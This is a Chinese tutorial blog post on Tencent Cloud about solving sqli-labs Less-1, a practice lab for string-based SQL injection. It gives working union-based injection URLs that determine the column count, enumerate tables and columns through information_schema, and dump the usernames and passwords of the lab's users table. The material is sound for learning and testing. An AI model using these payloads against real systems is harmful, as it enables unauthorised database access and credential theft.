Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >sqli-labs练习(第一关)——字符型

sqli-labs练习(第一关)——字符型

作者头像
宸寰客
发布于 2020-07-20 01:49:41
发布于 2020-07-20 01:49:41
61000
代码可运行
举报
文章被收录于专栏:yuancao博客yuancao博客
运行总次数:0
代码可运行

首先,进入靶场

1、判断是数字型还是字符型

在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。 (如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1

发现它是字符型。

2、通过报错判断闭合符

在id=2后面分别加上' , " 即单引号,双引号

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1%27

发现加'时报错了,而加"是正常显示,说明闭合符是"。所以我们应该使用',不能让它闭合了

3、确认查询的字段数量

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--+

在后面分别添加order by 1 --+order by 2 --+order by 3 --+……order by n --+,观察是否报错

我们发现在by 3的时候还是正常的,而by 4的时候就没了,说明要查询的字段数量是3个。

4、确认占位信息

…… union select 1,2,3 --+

把id的值换成-1,不让它显示正常的值,然后在后面加上union select 1,2,3 --+。查看字段的占位信息。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3%20--+

1的位置是dhakkan,固定的,只能在2,3下手。

5、找库名

…… union select 1,2,database() --+,把3换成database(),即在输出3的地方输出数据库名。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,database()%20--+

发现数据库名字是security

6、查表名

…… union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

group_concat()是把要输出的内容都放在一个分组里输出,如果不加的话,就只会输出第一个表名。如下:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

7、找表字段

至于找哪个表里的内容,当然是users表

…… union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema='security' and table_name='users'--+

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.COLUMNs%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

users表里有id,username,password三个字段。

8、找用户名和密码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(concat_ws(%27,%27,username,password)%20SEPARATOR%20%27|%27)%20from%20users%20--+

账号密码就出来了 不同用户以|分割,账号密码以,隔开

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020/07/17 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【less-1】基于SQLI的SQL字符型报错注入
通过本实验理解数字型报错SQL注入漏洞点的定位方法,掌握利用手工方式完成一次完整SQL注入的过程,熟悉常见SQL注入命令的操作。
未名编程
2024/10/12
1230
【less-1】基于SQLI的SQL字符型报错注入
sqli-labs通关笔记(1-30)
sqli-labs是一款练习sql注入的著名靶场。而造成SQL注入的原因是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为 称为SQL注入。通过本文将sqli-la
逍遥子大表哥
2022/04/15
2.2K0
sqli-labs通关笔记(1-30)
sqli-labs练习(第二关)——数字型
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16
宸寰客
2020/07/20
5480
sqli-labs练习(第二关)——数字型
SQLi_Labs通关文档【1-65关】
为了不干扰自己本机环境,sql-lab我就用的docker跑起来的,搭建也非常简单,也就两条命令
HACK学习
2019/08/05
4K1
零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶)
SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:
Ms08067安全实验室
2022/12/22
4.2K0
零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶)
【less-2】sqli-labs靶场第二关
https://sqli.wmcoder.site/sqli-labs/Less-2/
未名编程
2024/10/12
1390
【less-2】sqli-labs靶场第二关
Sqli-labs 大完结
常规注入,order by 4不行,order by 3 可以 然后,我们看看回显位置 如下是源码
wuming
2021/01/21
2.1K0
Sqli-labs 大完结
【Bypass】安全狗apache V4.0.23137 SQL注入绕过
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/04/15
9710
【Bypass】安全狗apache V4.0.23137 SQL注入绕过
sql-lib每日一记_Less2(day2)
SQL-Lib_Less2 查看源代码 本地环境试验访问地址:http://192.168.72.179/sqli-labs/Less-1/?id=1 查询语句 $sql=”SELECT * FR
用户6343818
2019/12/16
5020
sql-lib每日一记_Less2(day2)
超全sql注入实用语句_sql注入语句实例大全
目录 判断是否存在注入 判断列数 Union联合注入 爆数据库 爆表 爆字段 爆数据 sql盲注 导入导出文件 Post注入 修改useragent: 修改referer: 修改cookie gr
全栈程序员站长
2022/11/16
2.8K0
dnslog带出——sqli-labs第8关
另外打开一个新的页面,进入dnslog.cn 点击Get SubDomain,得到一个随机分配的子域名。 (每次点击都会重新生成一个随机的子域名,所以避免误点)
宸寰客
2020/08/11
7060
dnslog带出——sqli-labs第8关
Pentester之SQL过关纪实
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术,如:XSS跨站脚本攻击、SQL注入、目录遍历、命令注入、代码注入 、XML攻击、LDAP攻击、文件上传。靶场介绍可以查看官方网站[1]靶场环境搭建方法可以参考文章[2],先从SQL注入顺手练练
网络安全自修室
2020/08/21
5380
Pentester之SQL过关纪实
Sqli_labs65关通关详解(上)
Less-1 这个题目是基于错误,单引号,字符型注入, http://127.0.0.1/sqli/Less-1/?id=1' //报错 http://127.0.0.1/sqli/Less-
安恒网络空间安全讲武堂
2018/02/06
1.8K0
Sqli_labs65关通关详解(上)
sqli-labs less-1&less-2
union联合,合并:将多条查询语句的结合并成一个结果,union注入攻击位一种手工测试。
网安小透明
2021/04/23
7190
sqli-labs less-1&less-2
sql注入bypass最新版某狗
安全狗最新版本 and绕过 http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500011/ http://192.168.111.
红队蓝军
2022/05/17
2760
sql注入bypass最新版某狗
Sqli_labs65关通关详解(下)
less-31 逻辑跟30关一样,只不过 $id = '"' .$id. '"'; $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; 闭合的情况
安恒网络空间安全讲武堂
2018/02/06
1.4K0
Sqli_labs65关通关详解(下)
sqli-labs练习(第五、六关)
这一关,当输入正确的id时,会输出 You are in……,而输入错误的则什么都没有,只有个welcome。
宸寰客
2020/07/21
1K0
sqli-labs练习(第五、六关)
SQLI-LABS 更新帖(二)
Less-2 /sqli-labs/Less-2/?id=1 代码如下: $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysq
ChaMd5安全团队
2018/03/29
9870
SQLI-LABS 更新帖(二)
sqli-labs Lesson-1 字符型注入
这篇文章是我正式学习 sql 注入的第一篇文章,下载了 sqli-labs 靶机作为渗透环境,里面的题目很多,有几十题的 sql 注入,跟着网上的 wp 一起做了一题,然后还是学到挺多东西的,这里拿第一关来记录一下
棒棒鸡不棒
2022/09/01
4330
sqli-labs Lesson-1 字符型注入
Jarvis OJ inject
http://web.jarvisoj.com:32794/index.php~ 得到源码 <?php require("config.php"); $table = $_GET['t
wywwzjj
2023/05/09
4430
相关推荐
【less-1】基于SQLI的SQL字符型报错注入
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验